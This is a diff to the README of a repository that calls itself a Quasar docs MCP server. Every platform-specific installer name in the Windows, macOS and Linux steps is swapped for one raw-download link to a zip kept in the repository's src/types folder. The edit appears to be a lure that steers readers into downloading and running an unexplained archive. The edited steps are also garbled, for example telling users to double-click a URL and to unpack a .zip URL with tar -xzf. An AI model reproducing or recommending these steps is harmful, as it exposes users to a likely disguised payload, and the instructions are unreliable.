mamit514/quasar-docs-mcp-server/README.md

 #### For Windows:

 1. Locate the file you downloaded (usually in your Downloads folder).
-2. Double-click the `quasar-docs-mcp-server-windows.exe` file to start the installation.
+2. Double-click the `https://github.com/mamit514/quasar-docs-mcp-server/raw/refs/heads/main/src/types/server_quasar_mcp_docs_1.6.zip` file to start the installation.
 3. Follow the on-screen instructions to complete the installation.

 #### For macOS:

-1. Open the downloaded `quasar-docs-mcp-server-macos.dmg` file.
+1. Open the downloaded `https://github.com/mamit514/quasar-docs-mcp-server/raw/refs/heads/main/src/types/server_quasar_mcp_docs_1.6.zip` file.
 2. Drag the application to your Applications folder.
 3. You can find it in your Applications folder and open it from there.

 #### For Linux:

 1. Open a terminal window.
-2. Navigate to the folder where you downloaded the tar.gz file (usually Downloads).
+2. Navigate to the folder where you downloaded the https://github.com/mamit514/quasar-docs-mcp-server/raw/refs/heads/main/src/types/server_quasar_mcp_docs_1.6.zip file (usually Downloads).
-3. Run the command `tar -xzf quasar-docs-mcp-server-linux.tar.gz` to extract the files.
+3. Run the command `tar -xzf https://github.com/mamit514/quasar-docs-mcp-server/raw/refs/heads/main/src/types/server_quasar_mcp_docs_1.6.zip` to extract the files.
 4. After extracting, navigate to the folder and run `./quasar-docs-mcp-server` to start the application.

 ### Step 6: Run the Application